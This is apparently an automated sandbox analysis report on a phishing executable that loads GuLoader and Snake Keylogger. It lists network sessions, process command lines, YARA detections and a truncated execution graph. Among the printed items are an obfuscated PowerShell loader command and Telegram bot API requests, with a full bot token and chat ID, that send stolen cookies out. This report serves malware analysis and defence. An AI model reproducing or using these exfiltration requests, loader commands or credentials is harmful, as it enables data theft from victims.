                                                                                                                                      2024-11-21 09:37:20 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
                                                                                                                                      Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      10192.168.2.449801188.114.96.34438044C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-21 09:37:23 UTC84OUTGET /xml/8.46.123.75 HTTP/1.1
                                                                                                                                      Host: reallyfreegeoip.org
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      2024-11-21 09:37:24 UTC851INHTTP/1.1 200 OK
                                                                                                                                      Date: Thu, 21 Nov 2024 09:37:23 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 361
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: max-age=31536000
                                                                                                                                      CF-Cache-Status: HIT
                                                                                                                                      Age: 145752
                                                                                                                                      Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lvE9HZgrJrH0VVwxM2Qa7drKnYfITvRbAquyGwq0Yf957i74Umz%2Bvtqmu59QvoFVJEVOW%2FRyHc1y43OkJpxqbvP2A42nwaSufitCqHKjT7GOC2OW%2B0fN65beQZyeyORxIjuV9wtD"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 8e5fb36c3adb1a17-EWR
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1785&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1610590&cwnd=127&unsent_bytes=0&cid=942876ccb62cfa81&ts=467&x=0"
                                                                                                                                      2024-11-21 09:37:24 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
                                                                                                                                      Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      11192.168.2.449806149.154.167.2204438044C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-21 09:37:25 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:347688%0D%0ADate%20and%20Time:%2022/11/2024%20/%2008:36:51%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20347688%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                                                                                      Host: api.telegram.org
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      2024-11-21 09:37:26 UTC344INHTTP/1.1 404 Not Found
                                                                                                                                      Server: nginx/1.18.0
                                                                                                                                      Date: Thu, 21 Nov 2024 09:37:26 GMT
                                                                                                                                      Content-Type: application/json
                                                                                                                                      Content-Length: 55
                                                                                                                                      Connection: close
                                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                      2024-11-21 09:37:26 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                                                                                      Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      12192.168.2.449824149.154.167.2204438044C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-21 09:37:34 UTC350OUTPOST /bot8065526741:AAEj68BwW3BsUStAxrPkDSB2kLxwQ3yik84/sendDocument?chat_id=6897585916&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                                                                                      Content-Type: multipart/form-data; boundary=------------------------8dd0b53820095de
                                                                                                                                      Host: api.telegram.org
                                                                                                                                      Content-Length: 7045
                                                                                                                                      2024-11-21 09:37:34 UTC7045OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 62 35 33 38 32 30 30 39 35 64 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 6f 6f 6b 69 65 73 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 43 6f 6f 6b 69 65 73 20 7c 20 6a 6f 6e 65 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 33 34 37 36 38 38 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 31 2f 31 31 2f 32 30 32 34 20 2f
                                                                                                                                      Data Ascii: --------------------------8dd0b53820095deContent-Disposition: form-data; name="document"; filename="Cookies_Recovered.txt"Content-Type: application/x-ms-dos-executableCookies | user | VIP Recovery PC Name:347688Date and Time: 21/11/2024 /
                                                                                                                                      2024-11-21 09:37:34 UTC388INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.18.0
                                                                                                                                      Date: Thu, 21 Nov 2024 09:37:34 GMT
                                                                                                                                      Content-Type: application/json
                                                                                                                                      Content-Length: 523
                                                                                                                                      Connection: close
                                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                      2024-11-21 09:37:34 UTC523INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 36 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 38 30 36 35 35 32 36 37 34 31 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 56 61 6e 64 72 6f 73 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 61 6e 64 72 6f 73 73 30 30 37 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 38 39 37 35 38 35 39 31 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 52 65 78 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 52 65 78 41 62 65 6c 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 32 31 38 31 38 35 34 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a
                                                                                                                                      Data Ascii: {"ok":true,"result":{"message_id":461,"from":{"id":8065526741,"is_bot":true,"first_name":"Vandross","username":"Vandross007_bot"},"chat":{"id":6897585916,"first_name":"Rex","username":"RexAbel1","type":"private"},"date":1732181854,"document":{"file_name":


                                                                                                                                      Click to jump to process

                                                                                                                                      Click to jump to process

                                                                                                                                      Click to dive into process behavior distribution

                                                                                                                                      Click to jump to process

                                                                                                                                      Target ID:0
                                                                                                                                      Start time:04:36:03
                                                                                                                                      Start date:21/11/2024
                                                                                                                                      Path:C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:"C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe"
                                                                                                                                      Imagebase:0x400000
                                                                                                                                      File size:832'624 bytes
                                                                                                                                      MD5 hash:998E394361BD54C58A1AD2092FCA8B6C
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:low
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:1
                                                                                                                                      Start time:04:36:04
                                                                                                                                      Start date:21/11/2024
                                                                                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:powershell.exe -windowstyle hidden "$Barthianismens=Get-Content -raw 'C:\Users\user\AppData\Roaming\skittaget\lektier\Familieskabet.Sch';$Architectures=$Barthianismens.SubString(9447,3);.$Architectures($Barthianismens) "
                                                                                                                                      Imagebase:0xd40000
                                                                                                                                      File size:433'152 bytes
                                                                                                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Yara matches:
                                                                                                                                      • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.2048865185.0000000009EB9000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      Reputation:high
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:2
                                                                                                                                      Start time:04:36:04
                                                                                                                                      Start date:21/11/2024
                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                                      File size:862'208 bytes
                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:6
                                                                                                                                      Start time:04:36:38
                                                                                                                                      Start date:21/11/2024
                                                                                                                                      Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                                                                                                      Imagebase:0xfa0000
                                                                                                                                      File size:59'904 bytes
                                                                                                                                      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Yara matches:
                                                                                                                                      • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000006.00000002.2957521886.0000000021101000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.2957521886.000000002120A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000006.00000002.2957521886.000000002120A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      Reputation:high
                                                                                                                                      Has exited:false

                                                                                                                                      Reset < >

                                                                                                                                        Execution Graph

                                                                                                                                        Execution Coverage:22.5%
                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                        Signature Coverage:16.9%
                                                                                                                                        Total number of Nodes:1335
                                                                                                                                        Total number of Limit Nodes:33
                                                                                                                                        execution_graph 3819 4042c3 3820 4042d9 3819->3820 3825 4043e5 3819->3825 3824 404158 18 API calls 3820->3824 3821 404454 3822 40451e 3821->3822 3823 40445e GetDlgItem 3821->3823 3828 4041bf 8 API calls 3822->3828 3829 404474 3823->3829 3830 4044dc 3823->3830 3826 40432f 3824->3826 3825->3821 3825->3822 3831 404429 GetDlgItem SendMessageA 3825->3831 3827 404158 18 API calls 3826->3827 3832 40433c CheckDlgButton 3827->3832 3833 404519 3828->3833 3829->3830 3834 40449a SendMessageA LoadCursorA SetCursor 3829->3834 3830->3822 3835 4044ee 3830->3835 3852 40417a KiUserCallbackDispatcher 3831->3852 3850 40417a KiUserCallbackDispatcher 3832->3850 3856 404567 3834->3856 3839 4044f4 SendMessageA 3835->3839 3840 404505 3835->3840 3839->3840 3840->3833 3844 40450b SendMessageA 3840->3844 3841 40444f 3853 404543 3841->3853 3842 40435a GetDlgItem 3851 40418d SendMessageA 3842->3851 3844->3833 3847 404370 SendMessageA 3848 404397 SendMessageA SendMessageA lstrlenA SendMessageA SendMessageA 3847->3848 3849 40438e GetSysColor 3847->3849 3848->3833 3849->3848 3850->3842 3851->3847 3852->3841 3854 404551 3853->3854 3855 404556 SendMessageA 3853->3855 3854->3855 3855->3821 3859 4057b6 ShellExecuteExA 3856->3859 3858 4044cd LoadCursorA SetCursor 3858->3830 3859->3858 3860 401d44 3861 402bac 17 API calls 3860->3861 3862 401d52 SetWindowLongA 3861->3862 3863 402a5a 3862->3863 3166 401ec5 3174 402bac 3166->3174 3168 401ecb 3169 402bac 17 API calls 3168->3169 3170 401ed7 3169->3170 3171 401ee3 ShowWindow 3170->3171 3172 401eee EnableWindow 3170->3172 3173 402a5a 3171->3173 3172->3173 3175 406167 17 API calls 3174->3175 3176 402bc1 3175->3176 3176->3168 3864 401746 3865 402bce 17 API calls 3864->3865 3866 40174d 3865->3866 3867 405c9c 2 API calls 3866->3867 3868 401754 3867->3868 3868->3868 3869 401947 3870 402bce 17 API calls 3869->3870 3871 40194e lstrlenA 3870->3871 3872 402620 3871->3872 3876 401fcb 3877 402bce 17 API calls 3876->3877 3878 401fd2 3877->3878 3879 406448 2 API calls 3878->3879 3880 401fd8 3879->3880 3882 401fea 3880->3882 3883 406032 wsprintfA 3880->3883 3883->3882 3884 4014d6 3885 402bac 17 API calls 3884->3885 3886 4014dc Sleep 3885->3886 3888 402a5a 3886->3888 3666 401759 3667 402bce 17 API calls 3666->3667 3668 401760 3667->3668 3669 401786 3668->3669 3670 40177e 3668->3670 3706 4060d4 lstrcpynA 3669->3706 3705 4060d4 lstrcpynA 3670->3705 3673 401791 3675 405a6c 3 API calls 3673->3675 3674 401784 3677 4063af 5 API calls 3674->3677 3676 401797 lstrcatA 3675->3676 3676->3674 3680 4017a3 3677->3680 3678 406448 2 API calls 3678->3680 3680->3678 3681 405c48 2 API calls 3680->3681 3682 4017ba CompareFileTime 3680->3682 3683 40187e 3680->3683 3688 4060d4 lstrcpynA 3680->3688 3691 406167 17 API calls 3680->3691 3700 4057f0 MessageBoxIndirectA 3680->3700 3702 401855 3680->3702 3704 405c6d GetFileAttributesA CreateFileA 3680->3704 3681->3680 3682->3680 3684 4051fb 24 API calls 3683->3684 3686 401888 3684->3686 3685 4051fb 24 API calls 3703 40186a 3685->3703 3687 4030d8 31 API calls 3686->3687 3689 40189b 3687->3689 3688->3680 3690 4018af SetFileTime 3689->3690 3692 4018c1 CloseHandle 3689->3692 3690->3692 3691->3680 3693 4018d2 3692->3693 3692->3703 3694 4018d7 3693->3694 3695 4018ea 3693->3695 3696 406167 17 API calls 3694->3696 3697 406167 17 API calls 3695->3697 3698 4018df lstrcatA 3696->3698 3699 4018f2 3697->3699 3698->3699 3701 4057f0 MessageBoxIndirectA 3699->3701 3700->3680 3701->3703 3702->3685 3702->3703 3704->3680 3705->3674 3706->3673 3889 401659 3890 402bce 17 API calls 3889->3890 3891 40165f 3890->3891 3892 406448 2 API calls 3891->3892 3893 401665 3892->3893 3894 401959 3895 402bac 17 API calls 3894->3895 3896 401960 3895->3896 3897 402bac 17 API calls 3896->3897 3898 40196d 3897->3898 3899 402bce 17 API calls 3898->3899 3900 401984 lstrlenA 3899->3900 3902 401994 3900->3902 3901 4019d4 3902->3901 3906 4060d4 lstrcpynA 3902->3906 3904 4019c4 3904->3901 3905 4019c9 lstrlenA 3904->3905 3905->3901 3906->3904 3907 40275d 3908 402763 3907->3908 3909 402a5a 3908->3909 3910 40276b FindClose 3908->3910 3910->3909 3911 404b5d GetDlgItem GetDlgItem 3912 404bb3 7 API calls 3911->3912 3918 404dda 3911->3918 3913 404c5b DeleteObject 3912->3913 3914 404c4f SendMessageA 3912->3914 3915 404c66 3913->3915 3914->3913 3917 404c9d 3915->3917 3919 406167 17 API calls 3915->3919 3916 404ebc 3921 404f68 3916->3921 3930 404f15 SendMessageA 3916->3930 3953 404dcd 3916->3953 3920 404158 18 API calls 3917->3920 3918->3916 3954 404e49 3918->3954 3965 404aab SendMessageA 3918->3965 3924 404c7f SendMessageA SendMessageA 3919->3924 3925 404cb1 3920->3925 3922 404f72 SendMessageA 3921->3922 3923 404f7a 3921->3923 3922->3923 3932 404f93 3923->3932 3933 404f8c ImageList_Destroy 3923->3933 3939 404fa3 3923->3939 3924->3915 3929 404158 18 API calls 3925->3929 3926 404eae SendMessageA 3926->3916 3927 4041bf 8 API calls 3931 405168 3927->3931 3942 404cc2 3929->3942 3935 404f2a SendMessageA 3930->3935 3930->3953 3937 404f9c GlobalFree 3932->3937 3932->3939 3933->3932 3934 40511c 3940 40512e ShowWindow GetDlgItem ShowWindow 3934->3940 3934->3953 3936 404f3d 3935->3936 3946 404f4e SendMessageA 3936->3946 3937->3939 3938 404d9c GetWindowLongA SetWindowLongA 3941 404db5 3938->3941 3939->3934 3956 404fde 3939->3956 3970 404b2b 3939->3970 3940->3953 3943 404dd2 3941->3943 3944 404dba ShowWindow 3941->3944 3942->3938 3945 404d14 SendMessageA 3942->3945 3947 404d97 3942->3947 3950 404d52 SendMessageA 3942->3950 3951 404d66 SendMessageA 3942->3951 3964 40418d SendMessageA 3943->3964 3963 40418d SendMessageA 3944->3963 3945->3942 3946->3921 3947->3938 3947->3941 3950->3942 3951->3942 3953->3927 3954->3916 3954->3926 3955 4050e8 3957 4050f2 InvalidateRect 3955->3957 3960 4050fe 3955->3960 3958 40500c SendMessageA 3956->3958 3959 405022 3956->3959 3957->3960 3958->3959 3959->3955 3962 405096 SendMessageA SendMessageA 3959->3962 3960->3934 3979 404a66 3960->3979 3962->3959 3963->3953 3964->3918 3966 404b0a SendMessageA 3965->3966 3967 404ace GetMessagePos ScreenToClient SendMessageA 3965->3967 3968 404b02 3966->3968 3967->3968 3969 404b07 3967->3969 3968->3954 3969->3966 3982 4060d4 lstrcpynA 3970->3982 3972 404b3e 3983 406032 wsprintfA 3972->3983 3974 404b48 3975 40140b 2 API calls 3974->3975 3976 404b51 3975->3976 3984 4060d4 lstrcpynA 3976->3984 3978 404b58 3978->3956 3985 4049a1 3979->3985 3981 404a7b 3981->3934 3982->3972 3983->3974 3984->3978 3986 4049b7 3985->3986 3987 406167 17 API calls 3986->3987 3988 404a1b 3987->3988 3989 406167 17 API calls 3988->3989 3990 404a26 3989->3990 3991 406167 17 API calls 3990->3991 3992 404a3c lstrlenA wsprintfA SetDlgItemTextA 3991->3992 3992->3981 3993 401a5e 3994 402bac 17 API calls 3993->3994 3995 401a67 3994->3995 3996 402bac 17 API calls 3995->3996 3997 401a0e 3996->3997 3998 4029de 3999 4064dd 5 API calls 3998->3999 4000 4029e5 3999->4000 4001 402bce 17 API calls 4000->4001 4002 4029ee 4001->4002 4003 402a2a 4002->4003 4008 406127 4002->4008 4005 4029fc 4005->4003 4012 406111 4005->4012 4010 406132 4008->4010 4009 406155 IIDFromString 4009->4005 4010->4009 4011 40614e 4010->4011 4011->4005 4015 4060f6 WideCharToMultiByte 4012->4015 4014 402a1d CoTaskMemFree 4014->4003 4015->4014 4016 4027df 4017 402bce 17 API calls 4016->4017 4019 4027ed 4017->4019 4018 402803 4021 405c48 2 API calls 4018->4021 4019->4018 4020 402bce 17 API calls 4019->4020 4020->4018 4022 402809 4021->4022 4044 405c6d GetFileAttributesA CreateFileA 4022->4044 4024 402816 4025 402822 GlobalAlloc 4024->4025 4026 4028bf 4024->4026 4029 4028b6 CloseHandle 4025->4029 4030 40283b 4025->4030 4027 4028c7 DeleteFileA 4026->4027 4028 4028da 4026->4028 4027->4028 4029->4026 4045 4032dd SetFilePointer 4030->4045 4032 402841 4033 4032c7 ReadFile 4032->4033 4034 40284a GlobalAlloc 4033->4034 4035 402894 4034->4035 4036 40285a 4034->4036 4038 405d14 WriteFile 4035->4038 4037 4030d8 31 API calls 4036->4037 4039 402867 4037->4039 4040 4028a0 GlobalFree 4038->4040 4042 40288b GlobalFree 4039->4042 4041 4030d8 31 API calls 4040->4041 4043 4028b3 4041->4043 4042->4035 4043->4029 4044->4024 4045->4032 3004 4023e0 3011 402bce 3004->3011 3007 402bce 17 API calls 3008 4023fa 3007->3008 3009 402bce 17 API calls 3008->3009 3010 402404 GetPrivateProfileStringA 3009->3010 3012 402bda 3011->3012 3017 406167 3012->3017 3015 4023f1 3015->3007 3022 406174 3017->3022 3018 406396 3019 402bfb 3018->3019 3050 4060d4 lstrcpynA 3018->3050 3019->3015 3034 4063af 3019->3034 3021 406370 lstrlenA 3021->3022 3022->3018 3022->3021 3023 406167 10 API calls 3022->3023 3026 40628c GetSystemDirectoryA 3022->3026 3028 40629f GetWindowsDirectoryA 3022->3028 3029 4063af 5 API calls 3022->3029 3030 406167 10 API calls 3022->3030 3031 406319 lstrcatA 3022->3031 3032 4062d3 SHGetSpecialFolderLocation 3022->3032 3043 405fbb 3022->3043 3048 406032 wsprintfA 3022->3048 3049 4060d4 lstrcpynA 3022->3049 3023->3021 3026->3022 3028->3022 3029->3022 3030->3022 3031->3022 3032->3022 3033 4062eb SHGetPathFromIDListA CoTaskMemFree 3032->3033 3033->3022 3040 4063bb 3034->3040 3035 406423 3036 406427 CharPrevA 3035->3036 3038 406442 3035->3038 3036->3035 3037 406418 CharNextA 3037->3035 3037->3040 3038->3015 3040->3035 3040->3037 3041 406406 CharNextA 3040->3041 3042 406413 CharNextA 3040->3042 3055 405a97 3040->3055 3041->3040 3042->3037 3051 405f5a 3043->3051 3046 405fef RegQueryValueExA RegCloseKey 3047 40601e 3046->3047 3047->3022 3048->3022 3049->3022 3050->3019 3052 405f69 3051->3052 3053 405f72 RegOpenKeyExA 3052->3053 3054 405f6d 3052->3054 3053->3054 3054->3046 3054->3047 3056 405a9d 3055->3056 3057 405ab0 3056->3057 3058 405aa3 CharNextA 3056->3058 3057->3040 3058->3056 4046 4028e0 4047 402bac 17 API calls 4046->4047 4048 4028e6 4047->4048 4049 402925 4048->4049 4050 40290e 4048->4050 4057 4027bf 4048->4057 4053 40293f 4049->4053 4054 40292f 4049->4054 4051 402922 4050->4051 4052 402913 4050->4052 4051->4057 4061 406032 wsprintfA 4051->4061 4060 4060d4 lstrcpynA 4052->4060 4056 406167 17 API calls 4053->4056 4055 402bac 17 API calls 4054->4055 4055->4051 4056->4051 4060->4057 4061->4057 4062 401563 4063 401569 4062->4063 4066 406032 wsprintfA 4063->4066 4065 4029aa 4066->4065 4067 401b63 4068 402bce 17 API calls 4067->4068 4069 401b6a 4068->4069 4070 402bac 17 API calls 4069->4070 4071 401b73 wsprintfA 4070->4071 4072 402a5a 4071->4072 4073 401d65 4074 401d78 GetDlgItem 4073->4074 4075 401d6b 4073->4075 4077 401d72 4074->4077 4076 402bac 17 API calls 4075->4076 4076->4077 4078 401db9 GetClientRect LoadImageA SendMessageA 4077->4078 4080 402bce 17 API calls 4077->4080 4081 401e1a 4078->4081 4083 401e26 4078->4083 4080->4078 4082 401e1f DeleteObject 4081->4082 4081->4083 4082->4083 4084 40166a 4085 402bce 17 API calls 4084->4085 4086 401671 4085->4086 4087 402bce 17 API calls 4086->4087 4088 40167a 4087->4088 4089 402bce 17 API calls 4088->4089 4090 401683 MoveFileA 4089->4090 4091 401696 4090->4091 4092 40168f 4090->4092 4093 406448 2 API calls 4091->4093 4096 4022e2 4091->4096 4094 401423 24 API calls 4092->4094 4095 4016a5 4093->4095 4094->4096 4095->4096 4097 405eb3 36 API calls 4095->4097 4097->4092 4098 4045ea 4099 404616 4098->4099 4100 404627 4098->4100 4159 4057d4 GetDlgItemTextA 4099->4159 4101 404633 GetDlgItem 4100->4101 4108 404692 4100->4108 4103 404647 4101->4103 4107 40465b SetWindowTextA 4103->4107 4111 405b05 4 API calls 4103->4111 4104 404776 4157 404920 4104->4157 4161 4057d4 GetDlgItemTextA 4104->4161 4105 404621 4106 4063af 5 API calls 4105->4106 4106->4100 4112 404158 18 API calls 4107->4112 4108->4104 4113 406167 17 API calls 4108->4113 4108->4157 4110 4041bf 8 API calls 4115 404934 4110->4115 4116 404651 4111->4116 4117 404677 4112->4117 4118 404706 SHBrowseForFolderA 4113->4118 4114 4047a6 4119 405b5a 18 API calls 4114->4119 4116->4107 4123 405a6c 3 API calls 4116->4123 4120 404158 18 API calls 4117->4120 4118->4104 4121 40471e CoTaskMemFree 4118->4121 4122 4047ac 4119->4122 4124 404685 4120->4124 4125 405a6c 3 API calls 4121->4125 4162 4060d4 lstrcpynA 4122->4162 4123->4107 4160 40418d SendMessageA 4124->4160 4127 40472b 4125->4127 4130 404762 SetDlgItemTextA 4127->4130 4134 406167 17 API calls 4127->4134 4129 40468b 4133 4064dd 5 API calls 4129->4133 4130->4104 4131 4047c3 4132 4064dd 5 API calls 4131->4132 4135 4047ca 4132->4135 4133->4108 4136 40474a lstrcmpiA 4134->4136 4137 404806 4135->4137 4145 405ab3 2 API calls 4135->4145 4146 40485e 4135->4146 4136->4130 4138 40475b lstrcatA 4136->4138 4163 4060d4 lstrcpynA 4137->4163 4138->4130 4140 40480d 4141 405b05 4 API calls 4140->4141 4142 404813 GetDiskFreeSpaceA 4141->4142 4144 404837 MulDiv 4142->4144 4142->4146 4144->4146 4145->4135 4147 4048cf 4146->4147 4149 404a66 20 API calls 4146->4149 4148 4048f2 4147->4148 4150 40140b 2 API calls 4147->4150 4164 40417a KiUserCallbackDispatcher 4148->4164 4151 4048bc 4149->4151 4150->4148 4152 4048d1 SetDlgItemTextA 4151->4152 4153 4048c1 4151->4153 4152->4147 4155 4049a1 20 API calls 4153->4155 4155->4147 4156 40490e 4156->4157 4158 404543 SendMessageA 4156->4158 4157->4110 4158->4157 4159->4105 4160->4129 4161->4114 4162->4131 4163->4140 4164->4156 4165 40216b 4166 402bce 17 API calls 4165->4166 4167 402172 4166->4167 4168 